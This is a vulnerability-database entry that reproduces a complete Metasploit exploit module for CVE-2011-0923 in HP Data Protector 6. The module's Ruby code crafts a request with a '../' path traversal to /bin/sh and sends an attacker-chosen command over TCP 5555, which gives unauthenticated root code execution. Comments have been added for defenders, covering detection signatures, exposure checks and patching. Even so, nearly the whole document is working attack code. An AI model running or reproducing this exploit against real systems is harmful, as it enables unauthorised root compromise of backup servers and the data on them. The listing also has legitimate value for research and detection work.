HP Data Protector 6 EXEC_CMD Remote Code Execution

2012-02-24T18:06:47
ID MSF:EXPLOIT/LINUX/MISC/HP_DATA_PROTECTOR_CMD_EXEC
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

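This module targets a vulnerability in the HP Data Protector service (CVE-2011-0923). The flaw allows an unauthenticated attacker to abuse the EXEC_CMD command with a path traversal that resolves to /bin/sh, which results in arbitrary remote code execution in the context of root. The module's default target port is TCP 5555, so the practical exposure check is whether that port on a Data Protector host is reachable from untrusted networks.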

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit remote exploit module for the HP Data Protector EXEC_CMD flaw
# (CVE-2011-0923, per the References below).
#
# What the visible code does: it opens one TCP connection (default RPORT 5555),
# sends a single request whose last field is a run of "../" segments followed
# by "bin/sh", appends the command payload, and optionally prints whatever the
# service writes back.
#
# Notes for defenders reading this listing:
# - Exposure: the request carries only fixed strings and one random 4-letter
#   value; no credential or secret is sent, which matches the description's
#   "unauthenticated". Reachability of the service port is the precondition.
# - Detection: the fixed ASCII fields in the request ("SYSTEM", "c4an", "Poc",
#   "NTAUTHORITY" three times) and the "../" run immediately followed by
#   "bin/sh" are stable content in this module's traffic. The `user` field is
#   randomised per run and is not a usable indicator.
# - Mitigation: apply the vendor fix for CVE-2011-0923 (fixed versions are not
#   listed on this page; take them from the vendor advisory) and restrict
#   network access to the service port.
class MetasploitModule < Msf::Exploit::Remote
  # Module's self-declared reliability rank.
  Rank = ExcellentRanking

  # Provides connect / sock / disconnect used in #exploit.
  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (name, description, authors, references,
  # platform, payload constraints, target list) and the default remote port.
  #
  # @param info [Hash] metadata passed through to update_info and merged with
  #   the values declared here
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'HP Data Protector 6 EXEC_CMD Remote Code Execution',
      'Description'     => %q{
        This exploit abuses a vulnerability in the HP Data Protector service. This
        flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD
        command and traverse back to /bin/sh, this allows arbitrary remote code
        execution under the context of root.
      },
      'Author'          =>
        [
          'ch0ks',          # poc
          'c4an',           # msf poc
          'wireghoul',      # Improved msf
          'Javier Ignacio'  #Verified on A06.20
        ],
      # Identifiers to use when looking up vendor guidance and scanner coverage.
      'References'      =>
        [
          [ 'CVE', '2011-0923'],
          [ 'OSVDB', '72526'],
          [ 'ZDI', '11-055'],
          [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux'],
          [ 'URL', 'https://community.rapid7.com/thread/2253' ]
        ],
      'DisclosureDate'  => 'Feb 7 2011',
      'Platform'        => %w{ linux unix },
      # Command-string payloads only: ARCH_CMD with PayloadType 'cmd'.
      'Arch'            => ARCH_CMD,
      'Payload'         =>
        {
          'Space'       => 10000,
          'DisableNops' => true,
          'Compat'      => { 'PayloadType' => 'cmd' }
        },
      # Versions the module claims to cover; treat these as the minimum set of
      # installations to inventory, not as proof that other versions are safe.
      'Targets'         =>
        [
          [ 'HP Data Protector 6.10/6.11/6.20 on Linux', {}]
        ],
      'DefaultTarget'   => 0
    ))

    # Default service port for the TCP mixin; the operator can override it.
    register_options([Opt::RPORT(5555),])
  end

  # Builds the request, sends it over a single TCP connection, and prints any
  # response when the CMD datastore option is set.
  #
  # Connection errors (and any other StandardError raised inside the begin
  # block) are reported with one generic message; the socket is always closed.
  def exploit

    # Random 4-letter filler; differs on every run.
    user = rand_text_alpha(4)

    # Fixed 8-byte start of the request.
    # NOTE(review): the leading four bytes are presumably a length or record
    # prefix — not verifiable from this file.
    packet = "\x00\x00\x00\xa4\x20\x32\x00\x20"
    packet << user*2
    # "\x00\x20" (NUL, space) recurs between fields below; presumably the
    # protocol's field delimiter — confirm against a protocol reference.
    packet << "\x00\x20\x30\x00\x20"
    packet << "SYSTEM"
    # \x63\x34\x61\x6e is ASCII "c4an", the same handle listed under 'Author'.
    packet << "\x00\x20\x63\x34\x61\x6e"
    packet << "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20"
    packet << user
    packet << "\x20\x20\x20\x20\x00\x20"
    # \x50\x6f\x63 is ASCII "Poc".
    packet << "\x50\x6f\x63"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20\x30\x00\x20\x30\x00\x20"
    # Ten "../" segments; together with "bin/sh" below this is the path
    # traversal the description refers to, and the most distinctive content
    # for a network signature.
    packet << "../../../../../../../../../../"

    shell_mio = "bin/sh"

    # `shell` is the same String object as `shell_mio`; the appends below
    # mutate it in place.
    shell = shell_mio
    # 48 NUL bytes (3 x 16) separate the path from the payload text.
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    # Operator-selected command payload, terminated by a newline.
    shell << payload.encoded
    shell << "\n"

    sploit = packet + shell

    begin
      print_status("Sending our commmand...")
      connect
      sock.put(sploit)
      print_status("Waiting ...")
      # Framework hook that lets the selected payload's handler take over.
      handler

      # Read command output from socket if cmd/unix/generic payload was used
      if (datastore['CMD'])
        # Single read with a timeout argument of 10 (presumably seconds).
        res = sock.get_once(-1, 10)
        # NOTE(review): if get_once returns nil, res.empty? raises
        # NoMethodError, which the bare rescue below reports as a connection
        # error — confirm get_once's return value on timeout.
        print_status(res.to_s) if not res.empty?
      end

    # Bare rescue catches every StandardError, so the message below is also
    # printed for failures that are not connection or socket errors.
    rescue
      print_error("Error in connection or socket")
    ensure
      # Always close the socket, whether or not the send succeeded.
      disconnect
    end
  end
end